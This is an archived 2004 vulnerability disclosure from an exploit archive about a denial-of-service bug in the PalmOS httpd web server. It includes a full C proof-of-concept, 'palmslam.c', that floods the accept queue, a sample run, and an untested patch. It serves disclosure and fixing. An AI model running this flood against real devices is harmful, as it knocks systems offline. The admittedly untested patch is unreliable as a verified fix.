exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

PalmOShttpd.txt

PalmOShttpd.txt
Posted Feb 9, 2004
Authored by Shaun Colley

A bug exists in the PalmOS httpd that causes a crash with a "Fatal Error". Full exploit included.

tags | exploit
systems | palmos
SHA-256 | 5b285308b063e2d59eb136e0072c9ab4a49538d664eb748f4491f7dabcadc37a

PalmOShttpd.txt

Change Mirror Download
Introduction
#############

'httpd' for PalmOS was originally written by Jim Rees,
and is a simple webserver for Palm powered PDAs.
Since the development of httpd for Palm stopped, I
decided to modify 'httpd' slightly, and re-release it
on freshmeat.net.
However, httpd contains a bug which causes the device
to crash due to a "Fatal Error". The slightly
modified version of 'httpd' (called palmhttpd)
contains the same bug as the original, as I used Jim's
code.


The bug
########

The bug allows an attacker to crash the entire device,
causing a "Fatal Error", rendering the device unusable
until it is reset completely. PalmOS can only handle
1 client connection, but 'httpd' implements a while(1)
loop to accept() connections forever. Because of
this, httpd will accept more than 1 connection, which
PalmOS literally CANNOT do. The result is a dialog
box saying "Fatal Error, NetStack1.c overflowed
accept queue", which "Reset" button.

Below is the offending code:

---from httpd.c

[snip]
while (1) { /* Cause of the bug is here!
PalmOS can only accept 1 client connection! */
if (f) {
xclose(f);
f = NULL;
}
if (fd >= 0) {
close(fd);
fd = -1;
}

/* Accept connections */
len = sizeof saddr;
AppNetTimeout = SysTicksPerSecond() * 1;
if ((fd = accept(sfd, (struct sockaddr *)
&saddr, &len)) < 0) {
[snip]
---

Exploiting this DoS vulnerability will crash PalmOS
INDEFINATELY.



The exploit
############

Here is a PoC exploit for the issue:


---palmslam.c
/* PalmOS httpd accept queue overflow PoC exploit.
* Compile: gcc palmslam.c -o palmslam
*
* -shaun2k2
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
#define MAX_CON 1025
int main(int argc, char *argv[]) {
if(argc < 3) {
printf("Usage: palmslam <host>
<port>\n");
exit(-1);
}

int sock[MAX_CON];
int i;
struct sockaddr_in dest[MAX_CON];
struct hostent *host;
if((host = gethostbyname(argv[1])) == -1) {
printf("Couldn't resolve %s!\n",
argv[1]);
exit(-1);
}

for(i = 0; i <= MAX_CON; i++) {
if((sock[i] = socket(AF_INET,
SOCK_STREAM, 0)) == -1) {
printf("Couldn't create
socket!\n");
exit(-1);
}

dest[i].sin_family = AF_INET;
dest[i].sin_port =
htons(atoi(argv[2]));
dest[i].sin_addr = *((struct in_addr
*)host->h_addr);

if(connect(sock[i], (struct sockaddr
*)&dest[i], sizeof(struct sockaddr)) == -1) {
printf("Couldn't connect to %s
on port %s!\n", argv[1], argv[2]);
exit(-1);
}

printf("%d : Connected!\n", i);
}
return(0);
}
---

I connected my Sony CLIE to the net via a simple pppd
script, ran palmhttpd, and ran the PoC exploit against
it:

---
[root@localhost DoS]# ./palmslam 6X.XX.68.XX 80
0 : Connected!
1 : Connected!
2 : Connected!
---


At this point, my CLIE's screen presented me with the
dialog box.


+---------------------------------------+
| Fatal Error |
|---------------------------------------|
| |
| |
| Fatal Alert NetStack1.c, Line 4XXX, |
| overflowed accept queue |
| |
| |
| |
| |
| +-----------------+ |
| | Reset | |
| +-----------------+ |
| |
|---------------------------------------+



The fix
########

I have written a simple patch to fix the issue:

---httpd.patch
--- httpd.c 2004-01-14 17:21:41.000000000 +0000
+++ httpd.1.c 2004-02-08 17:13:33.000000000 +0000
@@ -391,8 +391,15 @@
NetLibAddrINToA(AppNetRefnum,
ifinfo.param.interfaceInfo.ipAddr, host);
printf("Listening on %s\n", host);

- while (1) {
- if (f) {
+ /* Here is where the bug manifests: PalmOS can
only take 1 client
+ * connection (according to even the PalmOS
programming documentation),
+ * but this loop accept()s connections forever.
The loop is now commented
+ * out, fixing the bug.
+ * -Shaun2k2
+ */
+
+ /*while (1) {*/
+ if (f) {
xclose(f);
f = NULL;
}
@@ -507,7 +514,7 @@
}

printf("stopped\n");
-}
+/*}*/

char html0[] = "HTTP/1.0 200 OK\nMIME-version:
1.0\nContent-type: %s\n\n";
---

Apply the patch: patch httpd.c httpd.patch

Type 'make' to recompile httpd. Although I haven't
tested the patch, I assume it works. Let me know if
it does not.

I will be uploading a patched version of palmhttpd to
freshmeat.net.


Credit
#######

This vulnerability was discovered by shaun2k2 / Shaun
Colley.



Thank you for your time.
Shaun.








___________________________________________________________
BT Yahoo! Broadband - Free modem offer, sign up online today and save £80 http://btyahoo.yahoo.co.uk
Login or Register to add favorites

File Archive:

November 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    16 Files
  • 2
    Nov 2nd
    17 Files
  • 3
    Nov 3rd
    17 Files
  • 4
    Nov 4th
    11 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    3 Files
  • 8
    Nov 8th
    59 Files
  • 9
    Nov 9th
    12 Files
  • 10
    Nov 10th
    6 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    1 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    9 Files
  • 15
    Nov 15th
    33 Files
  • 16
    Nov 16th
    53 Files
  • 17
    Nov 17th
    11 Files
  • 18
    Nov 18th
    14 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    26 Files
  • 22
    Nov 22nd
    22 Files
  • 23
    Nov 23rd
    10 Files
  • 24
    Nov 24th
    9 Files
  • 25
    Nov 25th
    11 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close